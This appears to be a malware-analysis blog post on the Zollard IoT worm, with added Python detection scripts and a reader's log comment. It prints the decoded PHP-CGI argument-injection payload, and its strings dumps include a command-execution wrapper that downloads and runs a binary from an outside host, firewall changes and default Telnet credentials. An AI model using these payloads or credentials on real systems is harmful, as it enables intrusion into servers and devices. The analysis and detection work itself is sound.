We've long been tracking exploit attempts against web servers, notably CMS hosts, ColdFusion, and vanilla PHP/CGI servers. Of late, we've observed a fairly large increase in PHP exploit attempts. So Symantec's recent report about Linux.Darlloz targeting "The Internet of Things" was of particular interest.
Recently I noted an inbound PHP exploit attempt from 78.39.232.113 - Telecommunication Company of Kordestan - Iran.
(Image: PHP exploit attempt from 78.39.232.113)
The decoded POST is:
-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n
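One way to spot requests like this in web server access logs, as an added example that is not part of the original post: it decodes the request target repeatedly (the payload above mixes literal and percent-encoded characters), looks for php-cgi "-d" overrides of directives such as allow_url_include and auto_prepend_file=php://input, and also flags the Zollard User-Agent. The log lines, addresses and function names are constructed for this example.

```python
"""Detect PHP-CGI argument injection (the Zollard POST pattern) in access logs.
Added example; the log lines below are constructed, not from the original post."""
import re
from urllib.parse import unquote

# php.ini directives the observed payload overrides with "-d"; any of them in a
# query string aimed at a php-cgi binary is a strong signal.
SUSPICIOUS_DIRECTIVES = {
    "allow_url_include", "safe_mode", "suhosin.simulation", "disable_functions",
    "open_basedir", "auto_prepend_file", "cgi.force_redirect", "cgi.redirect_status_env",
}
# php-cgi paths seen in the malware strings (/cgi-bin/php, php4, php5, php-cgi, php.cgi)
CGI_TARGETS = re.compile(r"/cgi-bin/php(?:4|5|-cgi|\.cgi)?$")

# Combined log format: ip - - [ts] "METHOD target HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample: one Zollard-style request (203.0.113.5 is a documentation
# address) and one ordinary request that must not alert.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Dec/2013:06:33:02 -0500] "POST /cgi-bin/php4?%2D%64+allow_url_include'
    '%3D%6Fn+-d+safe_mode%3Doff+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n HTTP/1.1" '
    '404 0 "-" "Zollard" "-"',
    '198.51.100.7 - - [30/Dec/2013:06:35:10 -0500] "GET /index.php?id=42 HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0" "-"',
]


def decode_target(text):
    """Percent-decode until stable so partially or doubly encoded payloads
    ('%6Fn', '%2F/input') come out as the php-cgi binary would see them."""
    prev, cur = None, text
    while cur != prev:
        prev, cur = cur, unquote(cur.replace("+", " "))
    return cur


def analyze_request(target):
    """Return (decoded path, list of (directive, value) pairs passed via -d)."""
    path, _, query = target.partition("?")
    decoded = decode_target(query)
    directives = re.findall(r"-d\s+([A-Za-z_.]+)\s*=\s*(\S*)", decoded)
    return decode_target(path), directives


def is_php_cgi_injection(target):
    """True when a php-cgi path is hit with any suspicious -d directive."""
    path, directives = analyze_request(target)
    if not CGI_TARGETS.search(path):
        return False
    return bool({name for name, _ in directives} & SUSPICIOUS_DIRECTIVES)


def scan_log(lines):
    """Yield one alert dict per log line that matches the injection or the UA."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_php_cgi_injection(m["target"]) or m["ua"] == "Zollard":
            path, directives = analyze_request(m["target"])
            alerts.append({"ip": m["ip"], "path": path, "ua": m["ua"],
                           "directives": dict(directives)})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The decode loop matters: a filter that only looks for the literal string "-d allow_url_include" misses the request above, because the attacker left some characters encoded, and a single unquote misses requests that were encoded twice.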
Note the User-Agent: Zollard and the references to the files that it will attempt to execute upon successful compromise. The file names indicate several architectures: arm, ppc, mips, mipsel, and x86.
All files were fetched, and the x86 file was sandboxed on a Linux VM. Immediately the VM began incrementally scanning 117.201.0.0/18 for an open destination port 58455. The Linux malware also opened a listener on my VM's port 58455.
(Image: Compromised host listening on port 58455)
Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies, including 0x010005, 0x01010006, or 0x01020006.
Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58445. Examining the strings of the malware files shows several usernames that are attempted, including "root" and "admin".
Weak or non-existent passwords allow for a successful Telnet login, with examples below:
(Image: Example of Telnet session to a BusyBox device)
(Image: Example of Telnet session to ARM architecture device)
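The peer-discovery behaviour described above (the 0x00020015 probe to port 58455, the listed replies, and one source walking an address range host by host) can be turned into simple detection logic. The following is an added example, not code from the original post: it classifies TCP payloads against those byte patterns and reports sources that probe many distinct hosts on port 58455 in sequence. The events, the addresses and the threshold of 16 hosts are constructed assumptions, and 0x010005 is used as written in the post.

```python
"""Flag Zollard peer discovery: the 4-byte probe to TCP/58455, the known
replies, and a source sweeping consecutive hosts on that port.
Added example over constructed events; not the original post's code."""
import ipaddress
from collections import defaultdict

PEER_PORT = 58455
PROBE = bytes.fromhex("00020015")
# Replies as listed in the write-up; "010005" is taken as written (3 bytes).
KNOWN_REPLIES = {bytes.fromhex(h) for h in ("010005", "01010006", "01020006")}

# Constructed sample: 192.0.2.10 probes 198.51.100.1-20, one host answers,
# and an unrelated TLS connection is mixed in (documentation address ranges).
SAMPLE_EVENTS = (
    [{"src": "192.0.2.10", "sport": 40000 + i, "dst": f"198.51.100.{i}",
      "dport": PEER_PORT, "payload": PROBE} for i in range(1, 21)]
    + [{"src": "198.51.100.5", "sport": PEER_PORT, "dst": "192.0.2.10",
        "dport": 40005, "payload": bytes.fromhex("01010006")}]
    + [{"src": "192.0.2.11", "sport": 51000, "dst": "198.51.100.200",
        "dport": 443, "payload": b"\x16\x03\x01"}]
)


def classify_payload(dport, sport, payload):
    """Label one TCP payload as 'probe', 'reply', or None."""
    if dport == PEER_PORT and payload == PROBE:
        return "probe"
    if sport == PEER_PORT and payload in KNOWN_REPLIES:
        return "reply"
    return None


def find_scanners(events, threshold=16):
    """Sources that contacted >= threshold distinct hosts on port 58455.
    'sequential' is True when the targets form one unbroken address run,
    matching the incremental sweep observed in the sandbox (threshold is an
    assumed value to tune per network)."""
    targets = defaultdict(set)
    for ev in events:
        if ev["dport"] == PEER_PORT:
            targets[ev["src"]].add(int(ipaddress.ip_address(ev["dst"])))
    result = {}
    for src, dsts in targets.items():
        if len(dsts) >= threshold:
            sequential = max(dsts) - min(dsts) + 1 == len(dsts)
            result[src] = {"hosts": len(dsts), "sequential": sequential}
    return result


def analyze(events, threshold=16):
    """Return (payload alerts as (label, src, dst) tuples, scanner summary)."""
    alerts = []
    for ev in events:
        label = classify_payload(ev["dport"], ev["sport"], ev["payload"])
        if label:
            alerts.append((label, ev["src"], ev["dst"]))
    return alerts, find_scanners(events, threshold)


if __name__ == "__main__":
    payload_alerts, scanners = analyze(SAMPLE_EVENTS)
    print(len(payload_alerts), "payload matches;", "scanners:", scanners)
```

A reply on port 58455 is the more useful of the two signals from a defender's point of view: it means a host inside the monitored network is already running the listener the post describes, not merely being probed.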
As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched. You may find it of interest to see a strings dump of each of the files:
Strings from 'arm' file
@ #! !1C " V! 0 /proc/self/exe nodes POST Host: User-Agent: Zollard Content-Type: application/x-www-form-urlencoded Content-Length: Connection: close $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); function myshellexec($cmd) global $disablefunc; $result = ""; if (!empty($cmd)) if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); return $result; myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86"); myshellexec("chmod +x /tmp/x86"); myshellexec("/tmp/x86"); HTTP/1.1 200 OK httpd /bin/sh /proc /proc/ /stat insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko iptables -D INPUT -p tcp --dport 23 -j DROP iptables -A INPUT -p tcp --dport 23 -j DROP telnetd /var/run/.lightpid /var/run/.aidrapid /var/run/lightpid /var/run/.lightscan /var/run/lightscan /var/run/mipsel /var/run/mips /var/run/sh /var/run/arm /var/run/ppc /var/run/m /var/run/mi /var/run/s /var/run/a /var/run/p /var/run/msx /var/run/mx /var/run/sx /var/run/ax /var/run/px /var/run/32 /var/run/sel /var/run/pid /var/run/gcc /var/run/dev /var/run/psx /var/run/mpl /var/run/mps /var/run/sph /var/run/arml /var/run/mips.l /var/run/mipsell /var/run/ppcl /var/run/shl /bin/pp /bin/mi /bin/mii /var/tmp/dreams.install.sh /var/tmp/ep2.ppc /var/0.run /var/1.run /var/idhash /var/response /var/challenge /var/b.arm_v5t /var/b.arm_v6k /var/f.arm_v5t /var/f-t2.arm_v6k /var/f-t2.mips /var/f-t2.mipsel /var/sp.arm_v5t /var/sp.arm_v6k /var/t2.arm_v6k /var/readme /var/b/b3.arm_v5t /var/b/b3.arm_v6k /var/b/b3.mips /var/b/b3.ramips /var/b/b3.rtl /var/b/readme /var/b/0.run /var/b/1.run /var/b/idhash /dav/0.run /dav/1.run /dav/b3.arm_v5t /dav/b3.arm_v6k /dav/b3.mips /dav/b3.rtl /dav/idhash /dav/readme /var/b /usr/bin/wget /usr/bin/-wget /var/run/z reboot #!/bin/sh ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot killall arm ppc mips mipsel sleep 10 /var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot GET / HTTP/1.1 Host: mipsel /cgi-bin/php /cgi-bin/php5 /cgi-bin/php-cgi /cgi-bin/php.cgi /cgi-bin/php4 EHW: p"XW m > echo -n > && echo -e \\x5A mkdir -p /var/run/.zollard/ chmod +x cp /bin/sh admin root 0!0 SHA1 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 .shstrtab .text .rodata .data .bss .comment

Strings from 'mips' file
/proc/self/exe nodes POST Host: User-Agent: Zollard Content-Type: application/x-www-form-urlencoded Content-Length: Connection: close $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); function myshellexec($cmd) global $disablefunc; $result = ""; if (!empty($cmd)) if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); return $result; myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86"); myshellexec("chmod +x /tmp/x86"); myshellexec("/tmp/x86"); HTTP/1.1 200 OK httpd /bin/sh /proc /proc/ /stat insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko iptables -D INPUT -p tcp --dport 23 -j DROP iptables -A INPUT -p tcp --dport 23 -j DROP telnetd /var/run/.lightpid /var/run/.aidrapid /var/run/lightpid /var/run/.lightscan /var/run/lightscan /var/run/mipsel /var/run/mips /var/run/sh /var/run/arm /var/run/ppc /var/run/m /var/run/mi /var/run/s /var/run/a /var/run/p /var/run/msx /var/run/mx /var/run/sx /var/run/ax /var/run/px /var/run/32 /var/run/sel /var/run/pid /var/run/gcc /var/run/dev /var/run/psx /var/run/mpl /var/run/mps /var/run/sph /var/run/arml /var/run/mips.l /var/run/mipsell /var/run/ppcl /var/run/shl /bin/pp /bin/mi /bin/mii /var/tmp/dreams.install.sh /var/tmp/ep2.ppc /var/tmp/ep2.mips /usr/bin/wget /usr/bin/-wget /var/run/z reboot #!/bin/sh ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot killall arm ppc mips mipsel sleep 10 /var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot GET / HTTP/1.1 Host: mips mipsel /cgi-bin/php /cgi-bin/php5 /cgi-bin/php-cgi /cgi-bin/php.cgi /cgi-bin/php4 EHW: p"XW m > echo -n > && echo -e \\x5A mkdir -p /var/run/.zollard/ chmod +x cp /bin/sh admin root 0!0 SHA1 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 .shstrtab .reginfo .text .rodata .data.rel.ro .data .got .sbss .bss .comment .mdebug.abi32 .pdr

Strings from 'mipsel' file
/proc/self/exe nodes POST Host: User-Agent: Zollard Content-Type: application/x-www-form-urlencoded Content-Length: Connection: close $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); function myshellexec($cmd) global $disablefunc; $result = ""; if (!empty($cmd)) if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); return $result; myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86"); myshellexec("chmod +x /tmp/x86"); myshellexec("/tmp/x86"); HTTP/1.1 200 OK httpd /bin/sh /proc /proc/ /stat insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko iptables -D INPUT -p tcp --dport 23 -j DROP iptables -A INPUT -p tcp --dport 23 -j DROP telnetd /var/run/.lightpid /var/run/.aidrapid /var/run/lightpid /var/run/.lightscan /var/run/lightscan /var/run/mipsel /var/run/mips /var/run/sh /var/run/arm /var/run/ppc /var/run/m /var/run/mi /var/run/s /var/run/a /var/run/p /var/run/msx /var/run/mx /var/run/sx /var/run/ax /var/run/px /var/run/32 /var/run/sel /var/run/pid /var/run/gcc /var/run/dev /var/run/psx /var/run/mpl /var/run/mps /var/run/sph /var/run/arml /var/run/mips.l /var/run/mipsell /var/run/ppcl /var/run/shl /bin/pp /bin/mi /bin/mii ep2.mips /var/tmp/dreams.install.sh /var/tmp/ep2.ppc /var/tmp/ep2.mips /usr/bin/wget /usr/bin/-wget /var/run/z reboot #!/bin/sh ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot killall arm ppc mips mipsel sleep 10 /var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot GET / HTTP/1.1 Host: mipsel /cgi-bin/php /cgi-bin/php5 /cgi-bin/php-cgi /cgi-bin/php.cgi /cgi-bin/php4 EHW: p"XW m GYvh QdV[3 y8G9 lQ\a< echo -n > && echo -e \\x5A mkdir -p /var/run/.zollard/ chmod +x cp /bin/sh admin root 0!0 SHA1 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 .shstrtab .reginfo .text .rodata .data.rel.ro .data .got .sbss .bss .comment .mdebug.abi32 .pdr

Strings from 'ppc' file
/proc/self/exe nodes POST Host: User-Agent: Zollard Content-Type: application/x-www-form-urlencoded Content-Length: Connection: close $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); function myshellexec($cmd) global $disablefunc; $result = ""; if (!empty($cmd)) if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); return $result; myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86"); myshellexec("chmod +x /tmp/x86"); myshellexec("/tmp/x86"); HTTP/1.1 200 OK httpd /bin/sh /proc /proc/ /stat insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko iptables -D INPUT -p tcp --dport 23 -j DROP iptables -A INPUT -p tcp --dport 23 -j DROP telnetd /var/run/.lightpid /var/run/.aidrapid /var/run/lightpid /var/run/.lightscan /var/run/lightscan /var/run/mipsel /var/run/mips /var/run/sh /var/run/arm /var/run/ppc /var/run/m /var/run/mi /var/run/s /var/run/a /var/run/p /var/run/msx /var/run/mx /var/run/sx /var/run/ax /var/run/px /var/run/32 /var/run/sel /var/run/pid /var/run/gcc /var/run/dev /var/run/psx /var/run/mpl /var/run/mps /var/run/sph /var/run/arml /var/run/mips.l /var/run/mipsell /var/run/ppcl /var/run/shl /bin/pp /bin/mi /bin/mii ep2.ppc /var/tmp/dreams.install.sh /var/tmp/ep2.ppc /usr/bin/wget /usr/bin/-wget /var/run/z reboot #!/bin/sh ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot killall arm ppc mips mipsel sleep 10 /var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot GET / HTTP/1.1 Host: mips mipsel /cgi-bin/php /cgi-bin/php5 /cgi-bin/php-cgi /cgi-bin/php.cgi /cgi-bin/php4 EHW: p"XW m GYvh QdV[3 y8G9 lQ\a< echo -n > && echo -e \\x5A mkdir -p /var/run/.zollard/ chmod +x cp /bin/sh admin root 0!0 SHA1 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 .shstrtab .text .rodata .data .sbss .bss .comment

Strings from 'x86' file
Host: User-Agent: Zollard Content-Type: application/x-www-form-urlencoded Content-Length: Connection: close $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); function myshellexec($cmd) global $disablefunc; $result = ""; if (!empty($cmd)) if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); return $result; myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86"); myshellexec("chmod +x /tmp/x86"); myshellexec("/tmp/x86"); HTTP/1.1 200 OK httpd nodes /bin/sh GET / HTTP/1.1 Host: /proc /proc/ /stat insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko iptables -D INPUT -p tcp --dport 23 -j DROP iptables -A INPUT -p tcp --dport 23 -j DROP telnetd /var/run/.lightpid /var/run/.aidrapid /var/run/lightpid /var/run/.lightscan /var/run/lightscan /var/run/mipsel /var/run/mips /var/run/sh /var/run/arm /var/run/ppc /var/run/m /var/run/mi /var/run/s /var/run/a /var/run/p /var/run/msx /var/run/mx /var/run/sx /var/run/ax /var/run/px /var/run/32 /var/run/sel /var/run/pid /var/run/gcc /var/run/dev /var/run/psx /var/run/mpl /var/run/mps /var/run/sph /var/run/arml /var/run/mips.l /var/run/mipsell /var/run/ppcl /var/run/shl /bin/pp /bin/mi /bin/mii /var/tmp/dreams.install.sh /var/tmp/ep2.ppc /usr/bin/wget /usr/bin/-wget /cgi-bin/php /cgi-bin/php5 /cgi-bin/php-cgi /cgi-bin/php.cgi /cgi-bin/php4 EHW: p"XW m > echo -n > && echo -e \\x5A mkdir -p /var/run/.zollard/ chmod +x cp /bin/sh root 1234 12345 dreambox smcadmin 0!0 SHA1 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 .shstrtab .text .rodata .data .bss .comment
So who is "Zollard"? What is the relationship between the scanned targets and the original scanner?
There is a good deal more research to be done on this malware, as well as the hosting infrastructure supporting these exploit attempts. At this point, we believe that the malware hosting location is a compromised host, and is not part of this campaign.
We recommend blocking IP address 78.39.232.113 and ensuring that all Internet-facing devices, yes, "devices", are strongly secured.
I got something similar. Different source IP though:
14.136.48.11 - - [30/Dec/2013:06:33:02 -0500] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 444 0 "-" "Zollard" "-"
The post part (I've received the same string) resolves to:
?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n